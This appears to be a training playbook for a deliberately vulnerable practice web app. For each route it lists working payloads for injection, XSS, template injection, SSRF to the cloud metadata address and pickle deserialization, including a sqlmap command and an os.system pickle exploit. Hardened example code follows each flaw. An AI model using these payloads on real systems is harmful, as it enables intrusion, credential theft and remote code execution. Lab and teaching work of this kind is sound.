VulnApp Playbook

1. Weak Authentication (/login)

Hardcoded credentials in the login handler: admin / adminpass

POST /login (form-encoded)
username=admin&password=adminpass
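The login check implied above compares a fixed username and password with plain string equality. The following is an added example (not VulnApp's own source) that places that pattern next to the hardened form a practitioner would expect: a salted PBKDF2 hash stored instead of the plaintext, verified with a constant-time comparison. The function names, the user store and the iteration count are assumptions for illustration.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

# Vulnerable pattern (constructed illustration of the playbook's description):
# the secret lives in source and is compared with ordinary ==.
def vulnerable_login(username: str, password: str) -> bool:
    return username == "admin" and password == "adminpass"

# Hardened form: only a salted PBKDF2-HMAC-SHA256 digest is stored.
PBKDF2_ITERATIONS = 600_000  # assumed work factor; tune to your hardware


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest); a fresh random salt is drawn when none is given."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, expected: bytes) -> bool:
    """Recompute the digest and compare in constant time."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected)


# Constructed user store: the plaintext never appears in the running code.
_SALT, _HASH = hash_password("adminpass")
USERS = {"admin": (_SALT, _HASH)}


def hardened_login(username: str, password: str) -> bool:
    record = USERS.get(username)
    if record is None:
        # Burn a hash anyway so a missing user is not distinguishable by timing.
        hash_password(password, b"\x00" * 16)
        return False
    salt, expected = record
    return verify_password(password, salt, expected)
```

Against the hardened form the credential pair from this playbook still works only because the store was seeded with it; the point is that the password is neither in the source nor recoverable from the stored digest, and a wrong guess costs the attacker the full PBKDF2 work factor per attempt.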

2. SQL Injection (/user?id=)

The id parameter is concatenated straight into the SQL string (SQLite backend, as the sqlite_version() probe below shows).

?id=1 OR 1=1                                  (tautology: returns every row)
?id=1 UNION SELECT 1, sqlite_version(), 3     (UNION with three columns; reveals the engine version)
sqlmap -u "http://localhost:5000/user?id=1" --batch --risk=3 --level=5
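Added example, not VulnApp's source: the string-built lookup the section describes, run against a constructed in-memory SQLite table so the two payloads above can be observed, beside the parameterised query that stops them. Table layout, function names and sample rows are assumptions.

```python
import sqlite3
from typing import List, Tuple

# Used only to confirm that the UNION payload really read sqlite_version().
SQLITE_VERSION = sqlite3.sqlite_version


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for VulnApp's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [
            (1, "alice", "alice@example.test"),
            (2, "bob", "bob@example.test"),
            (3, "carol", "carol@example.test"),
        ],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_id: str) -> List[Tuple]:
    """The pattern the playbook describes: raw ?id= spliced into the query text."""
    query = f"SELECT id, name, email FROM users WHERE id = {user_id}"
    return conn.execute(query).fetchall()


def safe_lookup(conn: sqlite3.Connection, user_id: str) -> List[Tuple]:
    """Parameterised form: the driver binds the value; it is never parsed as SQL."""
    return conn.execute(
        "SELECT id, name, email FROM users WHERE id = ?", (user_id,)
    ).fetchall()


def demo() -> dict:
    """Run both payloads from the playbook through each lookup."""
    conn = make_db()
    return {
        "normal": vulnerable_lookup(conn, "1"),
        "tautology": vulnerable_lookup(conn, "1 OR 1=1"),
        "union": vulnerable_lookup(conn, "1 UNION SELECT 1, sqlite_version(), 3"),
        "safe_normal": safe_lookup(conn, "1"),
        # Bound as a single text value: SQLite cannot coerce it to an integer,
        # so it matches no id and returns nothing instead of every row.
        "safe_tautology": safe_lookup(conn, "1 OR 1=1"),
    }
```

The UNION payload works only because the injected SELECT has the same column count as the original (three); a mismatch raises an error, which is the first thing to tune when adapting it to another endpoint.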

3. Command Injection (/ping?host=)

The host parameter is interpolated into a shell command line, so shell metacharacters start new commands.

?host=127.0.0.1; ls
?host=127.0.0.1 && whoami
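Added example (not VulnApp's code) showing why the two payloads above work and how the handler should be written instead. It tokenises the injected command line the way a POSIX shell would without executing it, validates the host as a literal IP address or plain hostname, and passes it as a single argv element with no shell. The validator, the argv helper and the use of echo as an offline stand-in for ping are assumptions.

```python
import ipaddress
import re
import shlex
import subprocess
from typing import List

# RFC 1123 label: alphanumerics and '-', no leading or trailing '-'.
# Rejecting a leading '-' also blocks argument injection (e.g. "-c 1000").
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_safe_host(host: str) -> bool:
    """Accept a literal IPv4/IPv6 address or a plain hostname; reject anything else."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    if not host or len(host) > 253:
        return False
    return all(_LABEL.match(label) for label in host.split("."))


def vulnerable_command(host: str) -> str:
    """The pattern the playbook describes: parameter spliced into a shell string."""
    return f"ping -c 1 {host}"


def shell_would_see(host: str) -> List[str]:
    """Tokenise the built command as a POSIX shell would, without running it.
    Separate ';' and '&&' tokens mark the extra command the attacker added."""
    lexer = shlex.shlex(vulnerable_command(host), posix=True, punctuation_chars=True)
    return list(lexer)


def ping_argv(host: str) -> List[str]:
    """Hardened form: validated host, argv list, no shell involved."""
    if not is_safe_host(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "1", host]


def run_argv_demo(host: str) -> str:
    """Offline stand-in for the ping call: with an argv list the metacharacters
    are just characters inside one argument (uses echo so the example runs anywhere)."""
    result = subprocess.run(["echo", host], capture_output=True, text=True, check=True)
    return result.stdout.rstrip("\n")
```

Note that the argv form alone is not enough: an attacker-controlled first argument beginning with '-' would still be parsed as an option by ping, which is why the validator refuses labels that start with a hyphen.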

4. Cross-Site Scripting (XSS) (/comment)

The comment body is echoed into the page without output encoding, so it is parsed as HTML.

<script>alert('XSS')</script>

5. Server-Side Template Injection (SSTI) (/render)

User input is compiled as template source rather than passed in as data (Jinja2-style syntax, consistent with the Flask app on port 5000).

{{7*7}} => 49                 (confirms evaluation)
{{config.items()}}            (dumps the application config, including any secrets in it)

6. Server-Side Request Forgery (SSRF) (/fetch)

The server fetches whatever URL it is given, with no scheme or destination allowlist, so it can be pointed at loopback services and the cloud metadata endpoint.

?url=http://127.0.0.1:5000
?url=http://169.254.169.254/latest/meta-data/     (IMDSv1; IMDSv2 requires a PUT for a token first, which a plain GET fetcher cannot do)
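Added example, not part of VulnApp: a destination check for a URL fetcher of the kind /fetch lacks. It restricts the scheme, maps IPv4-in-IPv6 addresses back to IPv4, refuses any non-global address (which covers 127.0.0.1 and 169.254.169.254 above), and for DNS names checks every resolved address. The resolver is injectable so the example runs offline; the function names and the constructed resolver results are assumptions.

```python
import ipaddress
import socket
from typing import Callable, List, Optional, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def _resolve(host: str) -> List[str]:
    """Default resolver: every address getaddrinfo returns for the name."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _normalise(ip_text: str) -> ipaddress._BaseAddress:
    ip = ipaddress.ip_address(ip_text)
    # ::ffff:127.0.0.1 is loopback dressed as IPv6; judge the embedded IPv4.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip


def check_fetch_url(url: str,
                    resolve: Optional[Callable[[str], List[str]]] = None) -> Tuple[bool, str]:
    """Return (allowed, reason). Apply this to the initial URL and to every redirect."""
    resolve = resolve or _resolve
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    try:
        candidates = [_normalise(host)]          # literal IP address
    except ValueError:
        try:
            candidates = [_normalise(a) for a in resolve(host)]   # DNS name
        except (socket.gaierror, ValueError) as exc:
            return False, f"cannot resolve {host!r}: {exc}"
        if not candidates:
            return False, f"{host!r} resolved to nothing"
    # Reject if ANY answer is non-global: an attacker may mix public and private records.
    for ip in candidates:
        if not ip.is_global:
            return False, f"{ip} is not a public address"
    return True, "ok"
```

Two caveats that the check alone does not cover: the connection must be made to the address that was checked (otherwise a second lookup at connect time allows DNS rebinding), and odd literal forms such as decimal or hexadecimal IPv4 are not parsed by ipaddress and fall through to the resolver path, so the resolver's answer, not the string, is what gets judged.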

7. Insecure Deserialization (/upload)

The uploaded file is passed straight to pickle.load(); any callable returned from __reduce__ runs on the server at load time.

import os
import pickle

class Exploit:
    # pickle records (callable, args); the callable is invoked when the server unpickles the file.
    def __reduce__(self):
        return (os.system, ('touch /tmp/pwned',))

with open("exploit.pkl", "wb") as f:
    pickle.dump(Exploit(), f)

Upload exploit.pkl to /upload; the marker file /tmp/pwned appearing on the server confirms execution.
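Added example (not VulnApp's code) for the receiving side of the same payload: the bytes the snippet above writes are built in memory and fed to an Unpickler whose find_class() only admits an allowlist, so the os.system gadget is refused before anything runs, while ordinary container data still loads. The allowlist contents and helper names are assumptions.

```python
import io
import os
import pickle


class Exploit:
    """Same trick as the playbook payload: the callable runs at load time."""
    def __reduce__(self):
        return (os.system, ("touch /tmp/pwned",))


def build_payload() -> bytes:
    """pickle.dumps only records the callable reference; nothing executes here."""
    return pickle.dumps(Exploit())


class RestrictedUnpickler(pickle.Unpickler):
    # Only these globals may be reconstructed; everything else (os.system,
    # subprocess.Popen, builtins.eval, ...) is refused. Extend deliberately.
    ALLOWED = {("builtins", "set"), ("builtins", "frozenset")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def try_load(data: bytes) -> str:
    """Report what the restricted loader does with an upload."""
    try:
        restricted_loads(data)
        return "loaded"
    except pickle.UnpicklingError as exc:
        return f"rejected: {exc}"


# Constructed benign upload: plain containers need no global lookups.
BENIGN = {"comment": "hello", "tags": ["a", "b"], "ids": {1, 2}}


def roundtrip(obj):
    return restricted_loads(pickle.dumps(obj))
```

Restricting find_class() removes the attacker's only route to a callable, but any class you add to the allowlist brings its own __setstate__ and __reduce__ behaviour with it, so the safer fix for an upload endpoint is to accept a data-only format such as JSON and not unpickle untrusted bytes at all.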

8. Flag Submission (/flags)

Submit flags discovered through exploitation.

9. Hidden Routes

Route                       Discovery method
/secret_admin               SSRF or forced browsing (e.g. /fetch?url=http://127.0.0.1:5000/secret_admin)
.hidden_assets/robots.txt   URL probing